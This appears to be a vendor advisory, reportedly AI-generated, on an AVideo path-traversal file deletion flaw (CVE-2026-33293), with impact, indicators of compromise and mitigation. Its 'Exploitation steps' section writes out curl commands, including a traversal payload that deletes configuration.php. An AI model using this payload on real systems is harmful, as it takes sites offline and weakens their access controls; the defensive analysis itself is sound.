CVE-2026-33293: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33293 is an arbitrary file deletion vulnerability via path traversal in the WWBN AVideo open-source video platform, specifically in the plugin/CloneSite/cloneServer.json.php endpoint's deleteDump parameter. It affects all AVideo versions up to and including 25.0, with version 26.0 introducing the fix. The vulnerability was published on March 18, 2026, and assigned a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, AVideo Security Advisory).

Technical details

The root cause is CWE-22 (Path Traversal): the deleteDump GET parameter in plugin/CloneSite/cloneServer.json.php is concatenated directly into a file path passed to PHP's unlink() function without any sanitization via basename(), realpath(), or equivalent normalization. The $clonesDir variable is constructed as {$videosDir}clones/, and the unsanitized user input is appended directly, allowing traversal sequences like ../../videos/configuration.php to resolve outside the intended directory. Exploitation requires valid clone credentials (a URL and key pair approved by an admin via thisURLCanCloneMe()), which are service-level credentials held by any approved clone partner — not an admin session. A complete proof-of-concept using curl is publicly documented in the security advisory (AVideo Security Advisory, GitHub Advisory).

Impact

Successful exploitation allows an authenticated attacker with low privileges to delete any file readable by the web server process, including configuration.php (which contains database credentials and is require_once'd by nearly every endpoint), .htaccess access-control files, uploaded videos and user photos, and SQL database dumps. Deleting configuration.php causes a complete denial of service, rendering the entire AVideo installation non-functional with fatal errors on every page load. Removing .htaccess or plugin security files can expose protected directories and weaken the application's security posture, potentially enabling further attacks such as unauthorized data access or privilege escalation (AVideo Security Advisory).

Exploitability

A proof-of-concept exploit consisting of concrete curl commands is publicly available in the GitHub security advisory, making exploitation straightforward for any attacker possessing valid clone credentials (AVideo Security Advisory). There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.04% (0.000400), indicating a currently low probability of exploitation in the next 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Obtain clone credentials: Acquire a valid clone URL and key pair that has been registered and approved (status 'a') by an AVideo admin — these are service-level credentials held by any approved clone partner.
  2. Verify target file existence: Confirm the target file (e.g., configuration.php) is present and accessible:
    curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
    # Expected: 200, 302, or 403 — file exists
  3. Send path traversal payload: Craft a GET request to the vulnerable endpoint with a deleteDump parameter containing directory traversal sequences:
    curl -s "https://avideo.local/plugin/CloneSite/cloneServer.json.php?url=https://approved-clone.local&key=VALID_CLONE_KEY&deleteDump=../../videos/configuration.php"
  4. Confirm successful deletion: A response of {"error":false,...} confirms unlink() succeeded. Verify by re-requesting the file:
    curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
    # Expected: 404 or 500 — file deleted
  5. Achieve objective: With configuration.php deleted, the entire AVideo application becomes non-functional (fatal errors on all pages). Alternatively, delete .htaccess files to expose protected directories or remove plugin/auth files to weaken security controls for further attacks (AVideo Security Advisory).

Indicators of compromise

  • Network: Unusual GET requests to /plugin/CloneSite/cloneServer.json.php containing deleteDump parameters with path traversal sequences (e.g., ../../, %2e%2e%2f); requests from unexpected source IPs using valid clone credentials.
  • Logs: Web server access logs showing requests to cloneServer.json.php with deleteDump values containing .. sequences; JSON responses with "error":false and "msg":"Delete Dump ..\/..\/..." patterns in application logs.
  • File System: Absence of critical files such as configuration.php, .htaccess, or plugin configuration files in expected locations under the AVideo web root; unexpected missing files in the videos/ directory (uploaded media, SQL dumps).
  • Application Behavior: AVideo pages returning PHP fatal errors referencing missing require_once files (e.g., configuration.php); previously protected directories becoming accessible without authentication.

Mitigation and workarounds

The recommended remediation is to upgrade AVideo to version 26.0 or later, which includes the patch commit 941decd that applies basename() to strip path traversal components and uses realpath() to verify the resolved path remains within $clonesDir before calling unlink() (AVideo Patch Commit). As interim mitigations: restrict web server process file system permissions to the minimum necessary (principle of least privilege); deploy a WAF rule to block requests to cloneServer.json.php containing .. or encoded traversal sequences in the deleteDump parameter; audit and rotate all clone credentials; and maintain regular backups of critical application files and database dumps to enable recovery (GitHub Advisory).

Community reactions

The vulnerability was reported by a researcher credited as "offset" and published by the AVideo maintainer (DanielnetoDotCom) on March 18, 2026. Coverage appeared on security aggregators including Tenable, VulDB, CIRCL, and INCIBE-CERT shortly after NVD publication. Social media posts on Bluesky noted the vulnerability, and security blogs such as infinitsec.net and yazoul.net published advisories summarizing the issue (AVideo Security Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management